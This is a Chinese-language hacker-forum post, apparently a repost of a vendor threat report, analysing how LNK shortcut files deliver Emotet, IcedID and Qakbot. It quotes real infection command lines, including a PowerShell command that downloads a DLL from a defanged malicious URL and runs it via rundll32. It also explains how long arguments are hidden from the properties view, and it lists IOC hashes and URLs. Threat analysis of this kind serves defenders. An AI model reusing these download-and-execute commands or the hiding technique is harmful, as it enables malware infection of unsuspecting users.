跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

LNK 类恶意软件兴起

HACK1949
HACK1949
问答中心

精选回复

发布于

LNK 类恶意软件兴起

62d0cd2b7f2ce.jpg

LNK 文件是 Windows 平台下的快捷方式,是打开文件、文件夹或者应用程序的“指针”。LNK 文件为 Shell Link 二进制文件格式,其中包含用于访问另一个数据对象的信息。

LNK 文件可以使用标准方式通过右键单击手动创建,也可以使用应用程序自动创建。许多工具都可以构建 LNK 文件,甚至包括恶意目的的工具 lnkbombs

2022 年第二季度,McAfee 发现 LNK 类恶意软件有所增长。攻击者通过 LNK 文件的易用性,传播 Emotet、Qakbot、IcedID、Bazarloaders 等恶意软件。

image.png-225kBLNK 恶意软件全球分布

LNK 快捷方式在普通用户眼里如下所示:

image.png-362.4kBLNK 视图

威胁与攻击活动

随着微软默认禁用 Office 宏,攻击者正在增强攻击手段,包括利用 LNK 文件实现攻击意图。

攻击者通过垃圾邮件或者恶意 URL 将 LNK 文件投递给受害者,这些文件通常会操纵 PowerShell、CMD 和 MSHTA 等合法应用程序下载恶意文件。

Emotet

感染链

image.png-314.4kB感染链

威胁分析

image.png-656.8kB携带 LNK 的电子邮件

上图中,可以看到诱饵消息与 LNK 附件文件。用户点击 LNK 文件,即可触发感染。该 LNK 文件的属性如下所示:

image.png-476.1kBLNK 文件属性

如上所示,LNK 调用 cmd.exe 执行命令。在属性页中最多可见 255 个字符,但实际命令行执行的参数最长可达 4096 个字符。攻击者利用这一差异,使长参数在属性中不可见。

本例中的参数为 /v:on /c findstr “glKmfOKnQLYKnNs.*” “Form 04.25.2022, US.lnk” > “%tmp%\YlScZcZKeP.vbs” & “%tmp%\YlScZcZKeP.vbs”

image.png-333.5kBLNK 文件内容

一旦 findstr.exe 接收到字符串,LNK 文件的其余内容将保存在 %temp% 文件夹下的 .VBS 文件中,随机文件名称为 YIScZcZKeP.vbs

cmd.exe 紧接着调用 wscript.exe 加载 VBS 文件下载 Emotet 的 64 位 DLL 文件。

下载的 DLL 文件通过 REGSVR32.EXE 进行执行,这与 Excel 的 Emotet 样本相类似。

ICEDID

感染链

image.png-97.5kBICEDID 感染链

威胁分析

LNK 文件通过 Powershell 执行高度混淆的参数,如下所示:

image.png-226.3kBICEDID 样本属性

参数非常长,在属性中不完全可见。运行时会将混淆参数解密,然后通过 hxxps://hectorcalle[.]com/093789.hta执行 MSHTA。

下载的 HTA 文件调用另一个具有类似混淆参数的 PowerShell,再拉取 hxxps://hectorcalle[.]com/listbul.exe

QAKBOT

感染链

image.png-59.4kBQAKBOT 感染链

威胁分析

image.png-229kBQAKBOT 样本属性

完整的参数为 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoExit iwr -Uri hxxps://news-wellness.com/5MVhfo8BnDub/D.png -OutFile $env:TEMP\test.dll;Start-Process rundll32.exe $env:TEMP\test.dll,jhbvygftr

PowerShell 会利用 Invoke-WebRequest 命令下载hxxps://news-wellness.com/5MVhfo8BnDub/D.png保存到 %temp% 文件夹下。DLL 文件即为 Qakbot,然后使用 rundll32 执行。

结论

在最近活跃的攻击行动中,攻击者滥用 Windows 快捷方式 LNK 文件发起攻击。LNK 也会与 PowerShell、CMD、MSHTA 等文件结合使用,实现完整攻击。

IOC

02eccb041972825d51b71e88450b094cf692b9f5f46f5101ab3f2210e2e1fe71
24ee20d7f254e1e327ecd755848b8b72cd5e6273cf434c3a520f780d5a098ac9
b5d5464d4c2b231b11b594ce8500796f8946f1b3a10741593c7b872754c2b172
hxxps://creemo[.]pl/wp-admin/ZKS1DcdquUT4Bb8Kb/
hxxp://filmmogzivota[.]rs/SpryAssets/gDR/
hxxp://demo34.ckg[.]hk/service/hhMZrfC7Mnm-9JD/
hxxp://focusmedica[.]in/fmlib/IxBABMh0I2cLM3qq1GVv/
hxxp://cipro[.]mx/prensa/siZP69rBFmibDvuTP1/
hxxps://hectorcalle[.]com/093789.hta
hxxps://hectorcalle[.]com/listbul.exe
hxxps://green-a-thon[.]com/LosZkUvr/B.png

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。